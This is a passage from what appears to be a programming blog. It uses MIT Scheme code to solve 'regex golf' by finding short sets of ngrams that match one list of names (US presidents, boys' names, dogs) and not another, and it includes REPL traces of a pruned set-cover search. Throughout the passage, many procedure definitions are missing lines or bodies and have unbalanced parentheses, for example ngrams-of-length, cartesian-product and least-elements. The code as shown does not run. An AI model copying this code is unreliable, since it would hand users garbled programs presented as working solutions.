(item) (member item good-keys)))))\n\n(write-string \"Deleting \") (write (- (length all-keys) (length good-keys)))\n(write-string \" of \") (write (length all-keys)) (write-string \" keys. \")\n(write (length good-keys)) (write-string \" keys remain.\")(newline)\n(map rebuild-entry value->keys-table)))\n\n(define (partial-solution-matches value->keys-table partial-solution)\n(keep-matching-items\nvalue->keys-table\n(lambda (entry)\n(there-exists? partial-solution (lambda (key) (member key (cdr entry)))))))\n\n(define (collect-equivalent-partial-solutions value->keys-table partial-solutions)\n\n(for-each (lambda (partial-solution)\n(map car (partial-solution-matches\nvalue->keys-table\npartial-solution))\n(list)\n(lambda (other)\npartial-solutions)\n\n(define (collect-dominant-partial-solutions equivalents better-solution)\n(define (dominates? left right)\n(and (superset? (car left) (car right))\n(not (better-solution (cdr right) (cdr left)))))\n\n(let ((sorted (sort equivalents\n(lambda (l r) (> (length (car l)) (length (car r)))))))\n(if (there-exists? answer (lambda (a) (dominates? a candidate)))\n'()\nsorted)))\n```\nWe can minimize the value->key-table in another way. If two values in the table are matched by the exact same set of keys, then we can delete one without changing the solution. If a value is matched by a small set of keys, and if another values is matched by a superset of these keys, then we can delete the larger one because if the smaller one matches, the larger one must match as well.\n```(define (minimize-values v-k-table)\n(let ((size-before (length v-k-table)))\n\n(define (dominated-value? entry)\n(let ((entry-value (car entry))\n(entry-keylist (cdr entry)))\n(there-exists? v-k-table\n(lambda (other-entry)\n(and (not (eq? entry other-entry))\n(let ((other-value (car other-entry))\n(other-keylist (cdr other-entry)))\n(let ((result (and (superset? entry-keylist other-keylist)\n(not (superset? other-keylist entry-keylist)))))\n(if result\n(begin (display \"Removing \")\n(write entry-value)\n(display \" dominated by \")\n(write other-value)\n(display \".\")\n(newline)\n))\nresult)))))))\n\n(let ((entry-value (car entry))\n(entry-keylist (cdr entry)))\n(lambda (other-entry)\n(let ((other-value (car other-entry))\n(other-keylist (cdr other-entry)))\n(let ((result (equal? entry-keylist other-keylist)))\n(if result\n(begin (display \"Removing \")\n(write entry-value)\n(display \" equivalent to \")\n(write other-value)\n(display \".\")\n(newline)\n))\nresult))))))\n\n(dominated-value? entry))\n\n(write-string \"Removed \") (write (- size-before (length answer)))\n(write-string \" dominated and equivalent values.\")\n(newline)\nEach time we remove values or keys, we might make more keys and values equivalent or dominated, so we iterate until we can no longer remove anything.\n```(define (minimize-vktable value->keys-table better-solution)\n(let* ((before-size (fold-left + 0 (map length value->keys-table)))\n(new-table\n(minimize-values\n(minimize-keys value->keys-table better-solution)))\n(after-size (fold-left + 0 (map length new-table))))\n(if (= before-size after-size)\nvalue->keys-table\n(minimize-vktable new-table better-solution))))```\nThe minimized table for the presidents looks like this:\n```((\"washington\" \"sh\" \"g..n\" \"n..o\" \".h.n\" \"a..i\")\n(\"monroe\" \"r.e\\$\" \"oe\")\n(\"van-buren\" \"u..n\" \"r.n\" \".b\" \"bu\" \"-\")\n(\"harrison\" \"r..s\" \"r.i\" \"i..n\" \"is.\" \"i.o\" \"a..i\")\n(\"polk\" \"po\")\n(\"taylor\" \"ay.\" \"ta\")\n(\"pierce\" \"ie.\" \"rc\" \"r.e\\$\")\n(\"buchanan\" \"bu\" \"a.a\" \".h.n\")\n(\"lincoln\" \"i..o\" \"li\")\n(\"grant\" \"an.\\$\" \"a.t\" \"ra\" \"r.n\" \"g..n\")\n(\"hayes\" \"h..e\" \"ye\" \"ay.\")\n(\"garfield\" \"el.\\$\" \"i.l\" \"ga\" \"ie.\" \"r.i\" \".f\" \"a..i\")\n(\"cleveland\" \"v.l\" \"an.\\$\")\n(\"mckinley\" \"n.e\" \"nl\" \"i.l\" \"m..i\")\n(\"roosevelt\" \".se\" \"oo\" \"v.l\" \"el.\\$\" \"r..s\")\n(\"taft\" \"a.t\" \"ta\" \".f\")\n(\"wilson\" \"ls\" \"i..o\")\n(\"harding\" \"r.i\" \"di\" \"a..i\")\n(\"coolidge\" \"oo\" \"li\")\n(\"hoover\" \"ho\" \"oo\")\n(\"truman\" \"u..n\" \"ma\")\n(\"eisenhower\" \"ho\" \".se\" \"h..e\" \"i..n\" \"is.\")\n(\"kennedy\" \"nn\" \"n.e\")\n(\"johnson\" \"j\")\n(\"nixon\" \"^n\" \"i..n\" \"i.o\" \"n..o\")\n(\"carter\" \"rt\" \"a.t\")\n(\"reagan\" \"ga\" \"a.a\")\n(\"bush\" \"bu\" \"sh\")\n(\"obama\" \".b\" \"ma\" \"a.a\" \"am\"))```\nAs you can see, we have reduced the original 2091 matching regexps to fifty.\n\nChanges to the set-cover code coming soon....\n\n## Friday, August 1, 2014\n\n### Mini regex golf\n\nI was intrigued by Peter Norvig's articles about regex golf.\n\nTo make things easier to think about, I decided to start with the simpler problem of looking for substrings. Here's code to extract the ngrams of a string:\n```(define (ngrams-of-length n string)\n(do ((start 0 (1+ start))\n(end n (1+ end))\n\n(define (ngrams string)\n(do ((n 1 (+ n 1))\nA solution is simply a list of ngrams. (Although not every list of ngrams is a solution!)\n```(define (solution? solution winners losers)\n(let ((matches-solution? (ngram-list-matcher solution)))\n(and (for-all? winners matches-solution?)\n(not (there-exists? losers matches-solution?)))))\n\n(define (ngram-list-matcher ngram-list)\n(lambda (test-string)\n(there-exists? ngram-list\n(lambda (ngram)\n(string-search-forward ngram test-string)))))\n```\nWe also want to know if an ngram appears in a given list of strings.\n```(define (string-list-matcher string-list)\n(lambda (test-ngram)\n(there-exists? string-list\n(lambda (string)\n(string-search-forward test-ngram string)))))\n\n(let ((matches-loser? (string-list-matcher losers)))\n(for-each\n(lambda (winner) (write-string winner) (write-string \": \")\n(write (reverse (delete-matching-items (ngrams winner) matches-loser?)))\n(newline))\nwinners)))\n\nwashington: (\"sh\" \"hi\" \"gt\" \"to\" \"was\" \"ash\" \"shi\" \"hin\" \"ngt\" \"gto\" ...)\njefferson: (\"j\" \"je\" \"ef\" \"ff\" \"fe\" \"rs\" \"jef\" \"eff\" \"ffe\" \"fer\" ...)\nmonroe: (\"oe\" \"onr\" \"nro\" \"roe\" \"monr\" \"onro\" \"nroe\" \"monro\" \"onroe\" \"monroe\")\njackson: (\"j\" \"ja\" \"ac\" \"ks\" \"jac\" \"ack\" \"cks\" \"kso\" \"jack\" \"acks\" ...)\nvan-buren: (\"-\" \"va\" \"n-\" \"-b\" \"bu\" \"van\" \"an-\" \"n-b\" \"-bu\" \"bur\" ...)\nharrison: (\"har\" \"arr\" \"rri\" \"ris\" \"iso\" \"harr\" \"arri\" \"rris\" \"riso\" \"ison\" ...)\npolk: (\"po\" \"pol\" \"olk\" \"polk\")\ntaylor: (\"ta\" \"yl\" \"lo\" \"tay\" \"ayl\" \"ylo\" \"lor\" \"tayl\" \"aylo\" \"ylor\" ...)\npierce: (\"rc\" \"ce\" \"pie\" \"ier\" \"erc\" \"rce\" \"pier\" \"ierc\" \"erce\" \"pierc\" ...)\nbuchanan: (\"bu\" \"uc\" \"ch\" \"na\" \"buc\" \"uch\" \"cha\" \"ana\" \"nan\" \"buch\" ...)\nlincoln: (\"li\" \"ln\" \"lin\" \"col\" \"oln\" \"linc\" \"inco\" \"ncol\" \"coln\" \"linco\" ...)\ngrant: (\"ra\" \"gra\" \"ran\" \"ant\" \"gran\" \"rant\" \"grant\")\nhayes: (\"ye\" \"hay\" \"aye\" \"yes\" \"haye\" \"ayes\" \"hayes\")\ngarfield: (\"ga\" \"rf\" \"fi\" \"gar\" \"arf\" \"rfi\" \"fie\" \"iel\" \"eld\" \"garf\" ...)\ncleveland: (\"lev\" \"vel\" \"ela\" \"clev\" \"leve\" \"evel\" \"vela\" \"elan\" \"cleve\" \"level\" ...)\nmckinley: (\"nl\" \"mck\" \"inl\" \"nle\" \"mcki\" \"kinl\" \"inle\" \"nley\" \"mckin\" \"ckinl\" ...)\nroosevelt: (\"oo\" \"os\" \"lt\" \"roo\" \"oos\" \"ose\" \"sev\" \"vel\" \"elt\" \"roos\" ...)\ntaft: (\"ta\" \"af\" \"ft\" \"taf\" \"aft\" \"taft\")\nwilson: (\"ls\" \"ils\" \"lso\" \"wils\" \"ilso\" \"lson\" \"wilso\" \"ilson\" \"wilson\")\nharding: (\"di\" \"har\" \"ard\" \"rdi\" \"din\" \"hard\" \"ardi\" \"rdin\" \"ding\" \"hardi\" ...)\ncoolidge: (\"oo\" \"li\" \"coo\" \"ool\" \"oli\" \"lid\" \"cool\" \"ooli\" \"olid\" \"lidg\" ...)\nhoover: (\"ho\" \"oo\" \"hoo\" \"oov\" \"hoov\" \"oove\" \"hoove\" \"oover\" \"hoover\")\ntruman: (\"tr\" \"ru\" \"ma\" \"tru\" \"rum\" \"uma\" \"man\" \"trum\" \"ruma\" \"uman\" ...)\neisenhower: (\"ei\" \"nh\" \"ho\" \"ow\" \"eis\" \"ise\" \"sen\" \"enh\" \"nho\" \"how\" ...)\nkennedy: (\"nn\" \"ed\" \"dy\" \"ken\" \"enn\" \"nne\" \"ned\" \"edy\" \"kenn\" \"enne\" ...)\njohnson: (\"j\" \"jo\" \"oh\" \"hn\" \"joh\" \"ohn\" \"hns\" \"john\" \"ohns\" \"hnso\" ...)\nnixon: (\"ni\" \"ix\" \"xo\" \"nix\" \"ixo\" \"xon\" \"nixo\" \"ixon\" \"nixon\")\ncarter: (\"rt\" \"car\" \"art\" \"rte\" \"cart\" \"arte\" \"rter\" \"carte\" \"arter\" \"carter\")\nreagan: (\"ea\" \"ag\" \"ga\" \"rea\" \"eag\" \"aga\" \"gan\" \"reag\" \"eaga\" \"agan\" ...)\nbush: (\"bu\" \"us\" \"sh\" \"bus\" \"ush\" \"bush\")\nclinton: (\"li\" \"to\" \"cli\" \"lin\" \"int\" \"nto\" \"ton\" \"clin\" \"lint\" \"into\" ...)\nobama: (\"ob\" \"ba\" \"am\" \"ma\" \"oba\" \"bam\" \"ama\" \"obam\" \"bama\" \"obama\")\n```\nWe can discard ngrams like \"shi\" because the shorter ngram \"sh\" will also match.\n```(define (dominant-ngrams string losing-ngram?)\n(do ((n 1 (+ n 1))\n(delete-matching-items\n(ngrams-of-length n string)\n(lambda (item)\n(lambda (ngram)\n(string-search-forward ngram item)))\n(losing-ngram? item))))\n\n(let ((matches-loser? (string-list-matcher losers)))\n(for-each\n(lambda (winner) (write-string winner) (write-string \": \")\n(write (dominant-ngrams winner matches-loser?))\n(newline))\nwinners)))\n\nwashington: (\"was\" \"to\" \"gt\" \"hi\" \"sh\")\njefferson: (\"rs\" \"fe\" \"ff\" \"ef\" \"j\")\nmonroe: (\"nro\" \"onr\" \"oe\")\njackson: (\"ks\" \"ac\" \"j\")\nvan-buren: (\"ren\" \"ure\" \"bu\" \"va\" \"-\")\nharrison: (\"iso\" \"ris\" \"rri\" \"arr\" \"har\")\npolk: (\"olk\" \"po\")\ntaylor: (\"lo\" \"yl\" \"ta\")\npierce: (\"ier\" \"pie\" \"ce\" \"rc\")\nbuchanan: (\"na\" \"ch\" \"uc\" \"bu\")\nlincoln: (\"inco\" \"col\" \"ln\" \"li\")\ngrant: (\"ant\" \"ra\")\nhayes: (\"hay\" \"ye\")\ngarfield: (\"eld\" \"iel\" \"fi\" \"rf\" \"ga\")\ncleveland: (\"ela\" \"vel\" \"lev\")\nmckinley: (\"mck\" \"nl\")\nroosevelt: (\"vel\" \"sev\" \"lt\" \"os\" \"oo\")\ntaft: (\"ft\" \"af\" \"ta\")\nwilson: (\"ls\")\nharding: (\"ard\" \"har\" \"di\")\ncoolidge: (\"li\" \"oo\")\nhoover: (\"oo\" \"ho\")\ntruman: (\"ma\" \"ru\" \"tr\")\neisenhower: (\"wer\" \"sen\" \"ise\" \"ow\" \"ho\" \"nh\" \"ei\")\nkennedy: (\"ken\" \"dy\" \"ed\" \"nn\")\njohnson: (\"hn\" \"oh\" \"j\")\nnixon: (\"xo\" \"ix\" \"ni\")\ncarter: (\"car\" \"rt\")\nreagan: (\"ga\" \"ag\" \"ea\")\nbush: (\"sh\" \"us\" \"bu\")\nclinton: (\"int\" \"to\" \"li\")\nobama: (\"ma\" \"am\" \"ba\" \"ob\")\n```\nIt's time to tackle the set cover problem. We want a set of ngrams that match all the strings. Obviously, if we pick an ngram from each of the strings we want to cover, we'll have a solution. For instance,\n```(let ((matches-loser? (string-list-matcher losers)))\n(solution? (delete-duplicates\n(map\n(lambda (winner) (car (dominant-ngrams winner matches-loser?)))\nwinners))\nwinners losers))\n;Value: #t\n```\nWe can cycle through all the possible solutions and then select the best one.\n```(define (mini-golf0 winners losers)\n(lowest-scoring\n(cover0 (make-dominant-ngram-table\nwinners\n(delete-losing-superstrings winners losers)))))\n\n(define (delete-losing-superstrings winners losers)\n(delete-matching-items\nlosers\n(lambda (loser)\n(there-exists? winners\n(lambda (winner)\n(string-search-forward winner loser))))))\n\n(define (make-dominant-ngram-table winners losers)\n(let ((losing-ngram? (string-list-matcher losers)))\n(map (lambda (winner)\n(cons winner (dominant-ngrams winner losing-ngram?)))\nwinners)))\n\n(define (cover0 v-k-table)\n(let ((empty-solution-set (list '())))\n\n(let ((value (car v-k-entry))\n(keys (cdr v-k-entry)))\n\n(write-string \"Adding value \") (write value) (newline)\n(write-string \" with keys \") (write keys) (newline)\n(write-string \" to \") (write (length solution-set))\n(write-string \" partial solutions.\") (newline)\n\n(let ((new-solutions\n(map make-new-solution (cartesian-product solution-set keys))))\n\n(write-string \"Returning \") (write (length new-solutions))\n(write-string \" new partial solutions.\") (newline)\n\nnew-solutions)))\n\n(define (lowest-scoring list)\n(least-elements list (lambda (l r) (< (score l) (score r)))))\n\n(define (cartesian-product left-list right-list)\nright-list))\n'()\nleft-list))\n\n(define (make-new-solution cp-term)\n(let ((solution (car cp-term))\n(key (cdr cp-term)))\n\n(define (improper-list-error procedure thing)\n(error (string-append \"Improper list found by \" procedure \": \") thing))\n\n(define (least-elements list <)\n((< item (car answer)) (cons item '()))\n\n(cond ((pair? list) (fold-left accumulate-least\n(cons (car list) '())\n(cdr list)))\n((null? list) (error \"List must have at least one element.\" list))\n(else (improper-list-error 'LEAST-ELEMENTS list))))\n\n(define (score solution)\n(do ((tail solution (cdr tail))\n(score -1 (+ score (string-length (car tail)) 1)))\n((not (pair? tail))\n(if (null? tail)\nscore\n(improper-list-error 'score solution)))))\n```\nThis works for small sets:\n```1 ]=> (mini-golf0 boys girls)\nwith keys (\"ob\" \"c\" \"j\")\nto 1 partial solutions.\nReturning 3 new partial solutions.\nwith keys (\"as\")\nto 3 partial solutions.\nReturning 3 new partial solutions.\nwith keys (\"an\" \"ha\")\nto 3 partial solutions.\nReturning 6 new partial solutions.\nwith keys (\"ah\" \"oa\" \"no\")\nto 6 partial solutions.\nReturning 18 new partial solutions.\nwith keys (\"lia\" \"lli\" \"ill\" \"am\" \"w\")\nto 18 partial solutions.\nReturning 90 new partial solutions.\nwith keys (\"lia\" \"am\")\nto 90 partial solutions.\nReturning 180 new partial solutions.\nwith keys (\"en\" \"de\" \"yd\" \"ay\" \"j\")\nto 180 partial solutions.\nReturning 900 new partial solutions.\nwith keys (\"ae\" \"ha\" \"c\")\nto 900 partial solutions.\nReturning 2700 new partial solutions.\nwith keys (\"de\" \"nd\" \"an\" \"le\" \"al\" \"r\" \"x\")\nto 2700 partial solutions.\nReturning 18900 new partial solutions.\nwith keys (\"en\" \"de\" \"id\")\nto 18900 partial solutions.\nReturning 56700 new partial solutions.\n;Value 41: ((\"de\" \"am\" \"ah\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"ah\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"oa\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"oa\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"no\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"no\" \"ha\" \"as\" \"j\")\n(\"de\" \"am\" \"ah\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"ah\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"oa\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"oa\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"no\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"no\" \"ha\" \"as\" \"c\")\n(\"de\" \"am\" \"ah\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"ah\" \"an\" \"as\" \"c\")\n(\"en\" \"am\" \"ah\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"oa\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"oa\" \"an\" \"as\" \"c\")\n(\"en\" \"am\" \"oa\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"no\" \"an\" \"as\" \"c\")\n(\"de\" \"am\" \"no\" \"an\" \"as\" \"c\")\n(\"en\" \"am\" \"no\" \"an\" \"as\" \"c\"))\n```\nBut you can see that we won't be able to go much beyond this because there are just too many combinations. We can cut down on the intermediate partial solutions by noticing that many of them are redundant. We don't need to keep partial solutions that cannot possibly lead to a shortest final solution. The various partial solutions each (potentially) match different sets of words. We only need keep the shortest solution for each different set of matched words. Furthermore, if a solution's matches are a superset of another's matches, and the other is the same length or longer, then the solution is dominated by the other and will always be at least the length of the longer.\n```(define (mini-golf1 winners losers)\n(cover1\n(make-dominant-ngram-table winners (delete-losing-superstrings winners losers))\nlowest-scoring))\n\n(define (cover1 v-k-table lowest-scoring)\n(let ((empty-solution-set (list '())))\n\n(let ((value (car v-k-entry))\n(keys (cdr v-k-entry)))\n\n(write-string \"Adding value \") (write value) (newline)\n(write-string \" with keys \") (write keys) (newline)\n(write-string \" to \") (write (length solution-set))\n(write-string \" partial solutions.\") (newline)\n\n(let ((new-solutions\n(map make-new-solution (cartesian-product solution-set keys))))\n\n(let ((trimmed-solutions (trim-partial-solutions new-solutions)))\n\n(write-string \"Returning \") (write (length trimmed-solutions))\n(write-string \" of \") (write (length new-solutions))\n(write-string \" new partial solutions.\") (newline)\n\ntrimmed-solutions))))\n\n(define (trim-partial-solutions partial-solutions)\n(let ((equivalent-solutions (collect-equivalent-partial-solutions partial-solutions)))\n(write-string \" Deleting \")\n(write (- (length partial-solutions) (length equivalent-solutions)))\n(write-string \" equivalent partial solutions.\")\n(newline)\n\n(remove-dominated-solutions\n(map lowest-scoring-equivalent-partial-solution equivalent-solutions))))\n\n(define (lowest-scoring-equivalent-partial-solution entry)\n(first (lowest-scoring (car entry))))\n\n(define (collect-equivalent-partial-solutions alist)\n;; Add each entry in turn.\n(fold-left (lambda (equivalents partial-solution)\npartial-solution\n(partial-solution-matches partial-solution)\nequivalents))\n'() alist))\n\n(define (partial-solution-matches partial-solution)\n(keep-matching-items v-k-table\n(lambda (entry)\n(there-exists? partial-solution\n(lambda (key) (member key (cdr entry)))))))\n\n(define (remove-dominated-solutions partial-solutions)\n(let ((before-length (length partial-solutions)))\n'()\n(map (lambda (partial-solution)\n(cons partial-solution (partial-solution-matches partial-solution)))\npartial-solutions)))))\n(write-string \" Deleting \") (write (- before-length after-length))\n(write-string \" dominated solutions.\")\n(newline)\n\n(lowest-scoring\n\n(define (dominates-solution? solution)\n(let ((partial-solution (car solution))\n(solution-matches (cdr solution)))\n(lambda (other-solution)\n(let ((other-partial-solution (car other-solution))\n(other-matches (cdr other-solution)))\n(and (not (equal? solution-matches other-matches))\n(superset? other-matches solution-matches)\n(<= (score other-partial-solution) (score partial-solution)))))))\n\n(cond ((pair? alist)\n(let ((entry (car alist))\n(tail (cdr alist)))\n(let ((entry-solutions (car entry))\n(entry-value (cdr entry)))\n(if (equal? value entry-value)\n(if (member solution entry-solutions)\nalist\n(cons (cons (cons solution entry-solutions) value)\ntail))\n(cons entry (add-equivalent-partial-solution solution value tail))))))\n((null? alist) (list (cons (list solution) value)))\n(else (improper-list-error 'collect-equivalents alist))))\n```\n```1 ]=> (mini-golf1 winners losers)\nwith keys (\"was\" \"to\" \"gt\" \"hi\" \"sh\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 1 dominated solutions.\nReturning 2 of 5 new partial solutions.\nto 2 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 4 of 6 new partial solutions.\nwith keys (\"rs\" \"fe\" \"ff\" \"ef\" \"j\")\nto 4 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 4 dominated solutions.\nReturning 4 of 20 new partial solutions.\nwith keys (\"iso\" \"di\" \"ad\" \"ma\")\nto 4 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 12 of 16 new partial solutions.\nwith keys (\"nro\" \"onr\" \"oe\")\nto 12 partial solutions.\nDeleting 24 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 36 new partial solutions.\nwith keys (\"ks\" \"ac\" \"j\")\nto 12 partial solutions.\nDeleting 24 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 36 new partial solutions.\nwith keys (\"ren\" \"ure\" \"bu\" \"va\" \"-\")\nto 12 partial solutions.\nDeleting 36 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 24 of 60 new partial solutions.\nwith keys (\"iso\" \"ris\" \"rri\" \"arr\" \"har\")\nto 24 partial solutions.\nDeleting 96 equivalent partial solutions.\nRemoving 12 dominated solutions.\nReturning 12 of 120 new partial solutions.\nwith keys (\"olk\" \"po\")\nto 12 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 24 new partial solutions.\nwith keys (\"lo\" \"yl\" \"ta\")\nto 12 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 12 dominated solutions.\nReturning 12 of 36 new partial solutions.\nwith keys (\"ier\" \"pie\" \"ce\" \"rc\")\nto 12 partial solutions.\nDeleting 36 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 48 new partial solutions.\nwith keys (\"na\" \"ch\" \"uc\" \"bu\")\nto 12 partial solutions.\nDeleting 39 equivalent partial solutions.\nRemoving 3 dominated solutions.\nReturning 6 of 48 new partial solutions.\nwith keys (\"inco\" \"col\" \"ln\" \"li\")\nto 6 partial solutions.\nDeleting 15 equivalent partial solutions.\nRemoving 6 dominated solutions.\nReturning 3 of 24 new partial solutions.\nwith keys (\"ant\" \"ra\")\nto 3 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 3 of 6 new partial solutions.\nwith keys (\"hay\" \"ye\")\nto 3 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 3 of 6 new partial solutions.\nwith keys (\"eld\" \"iel\" \"fi\" \"rf\" \"ga\")\nto 3 partial solutions.\nDeleting 9 equivalent partial solutions.\nRemoving 3 dominated solutions.\nReturning 3 of 15 new partial solutions.\nwith keys (\"ela\" \"vel\" \"lev\")\nto 3 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 9 new partial solutions.\nwith keys (\"mck\" \"nl\")\nto 6 partial solutions.\nDeleting 6 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 12 new partial solutions.\nwith keys (\"vel\" \"sev\" \"lt\" \"os\" \"oo\")\nto 6 partial solutions.\nDeleting 24 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 30 new partial solutions.\nwith keys (\"ft\" \"af\" \"ta\")\nto 6 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 18 new partial solutions.\nwith keys (\"ls\")\nto 6 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 6 new partial solutions.\nwith keys (\"ard\" \"har\" \"di\")\nto 6 partial solutions.\nDeleting 12 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 4 of 18 new partial solutions.\nwith keys (\"li\" \"oo\")\nto 4 partial solutions.\nDeleting 4 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 4 of 8 new partial solutions.\nwith keys (\"oo\" \"ho\")\nto 4 partial solutions.\nDeleting 4 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 2 of 8 new partial solutions.\nwith keys (\"ma\" \"ru\" \"tr\")\nto 2 partial solutions.\nDeleting 4 equivalent partial solutions.\nRemoving 1 dominated solutions.\nReturning 1 of 6 new partial solutions.\nwith keys (\"wer\" \"sen\" \"ise\" \"ow\" \"ho\" \"nh\" \"ei\")\nto 1 partial solutions.\nDeleting 6 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 7 new partial solutions.\nwith keys (\"ken\" \"dy\" \"ed\" \"nn\")\nto 1 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 4 new partial solutions.\nwith keys (\"hn\" \"oh\" \"j\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"xo\" \"ix\" \"ni\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"car\" \"rt\")\nto 1 partial solutions.\nDeleting 1 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 2 new partial solutions.\nwith keys (\"ga\" \"ag\" \"ea\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"sh\" \"us\" \"bu\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"int\" \"to\" \"li\")\nto 1 partial solutions.\nDeleting 2 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 3 new partial solutions.\nwith keys (\"ma\" \"am\" \"ba\" \"ob\")\nto 1 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 4 new partial solutions.\n;Value 47: ((\"rt\" \"ni\" \"nn\" \"ho\" \"ls\" \"nl\" \"vel\" \"ga\" \"ye\" \"ra\" \"li\" \"rc\" \"ta\" \"po\" \"har\" \"bu\" \"oe\" \"ma\" \"j\" \"ad\" \"sh\"))```\nThe `cover` procedure takes a table that maps values to the keys that cover them. If we can reduce the size of that table without changing the solution, we'll run faster. If there are two entries in the table such that the keys of one are a superset of the keys of the other, we can discard the superset: the smaller of the two entries will be in the solution, and any key that matches the smaller one will automatically match the larger one as well. Also, if two values have the same set of keys that match them, we need only include one of the values in the table.\n```(define (delete-dominated-values v-k-table)\n(let ((size-before (length v-k-table)))\n\n(define (dominated-value? entry)\n(let ((entry-value (car entry))\n(entry-keylist (cdr entry)))\n(there-exists? v-k-table\n(lambda (other-entry)\n(and (not (eq? entry other-entry))\n(let ((other-value (car other-entry))\n(other-keylist (cdr other-entry)))\n(and (superset? entry-keylist other-keylist)\n(not (equal? other-keylist entry-keylist)))))))))\n\n(let ((entry-value (car entry))\n(entry-keylist (cdr entry)))\n(lambda (other-entry)\n(let ((other-value (car other-entry))\n(other-keylist (cdr other-entry)))\n(equal? entry-keylist other-keylist))))))\n\n(dominated-value? entry))\n\n(write-string \"Removed \") (write (- size-before (length answer)))\n(write-string \" dominated and equivalent values.\")\n(newline)\n\n(define (superset? bigger smaller)\n(for-all? smaller (lambda (s) (member s bigger))))\n\n(define (mini-golf2 winners losers)\n(cover1\n(delete-dominated-values\n(make-dominant-ngram-table winners (delete-losing-superstrings winners losers)))\nlowest-scoring))\n\n;;;;;;;;\n;; Delete dominated keys from the keylists.\n\n(define (mini-golf3 winners losers)\n(cover1\n(delete-dominated-keys-and-values\n(make-dominant-ngram-table winners (delete-losing-superstrings winners losers))\n(lambda (left right)\n(or (< (string-length left) (string-length right))\n(and (= (string-length left) (string-length right))\n(string<? left right)))))\nlowest-scoring))\n\n(define (delete-dominated-keys-and-values v-k-table better-key)\n(let ((before-size (fold-left * 1 (map length v-k-table))))\n(let ((new-table (delete-dominated-values\n(delete-dominated-keys v-k-table better-key))))\n(let ((after-size (fold-left * 1 (map length new-table))))\n(if (= before-size after-size)\nv-k-table\n(delete-dominated-keys-and-values new-table better-key))))))\n\n(define (delete-dominated-keys v-k-table better-key)\n(let ((all-keys (get-all-keys v-k-table)))\n\n(define (lookup-key key)\n(cons key\n(map car\n(keep-matching-items v-k-table\n(lambda (v-k-entry)\n(member key (cdr v-k-entry)))))))\n\n(let ((k-v-table (map lookup-key all-keys)))\n\n(define (dominated-key? key)\n(let ((values (cdr (assoc key k-v-table))))\n(there-exists? k-v-table\n(lambda (entry)\n(let ((entry-key (car entry))\n(entry-values (cdr entry)))\n(and (superset? entry-values values)\n(not (equal? values entry-values))\n(or (< (string-length entry-key) (string-length key))\n(and (= (string-length entry-key) (string-length key))\n(string<? entry-key key)))))))))\n\n(let ((values (cdr (assoc key k-v-table))))\n(lambda (entry-key)\n(let ((entry-values (cdr (lookup-key entry-key))))\n(equal? values entry-values))))))\n\n(if (or (dominated-key? key)\n\n(let ((good-keys (fold-left add-keys '() (sort all-keys better-key))))\n(write-string \"Removed \") (write (- (length all-keys) (length good-keys)))\n(write-string \" of \") (write (length all-keys)) (write-string \" keys.\")(newline)\n\n(map (lambda (entry)\n(cons (car entry)\n(keep-matching-items (cdr entry) (lambda (key) (member key good-keys)))))\nv-k-table)))))\n\n(define (get-all-keys v-k-table)\n(cdr entry)))\n'()\nv-k-table))```\nTrimming the table this way helps a lot. We can now compute the dogs vs. cats.\n```1 ]=> (mini-golf3 dogs cats)\n\nRemoved 294 of 405 keys.\nRemoved 44 dominated and equivalent values.\nRemoved 25 of 93 keys.\nRemoved 15 dominated and equivalent values.\nRemoved 7 of 62 keys.\nRemoved 0 dominated and equivalent 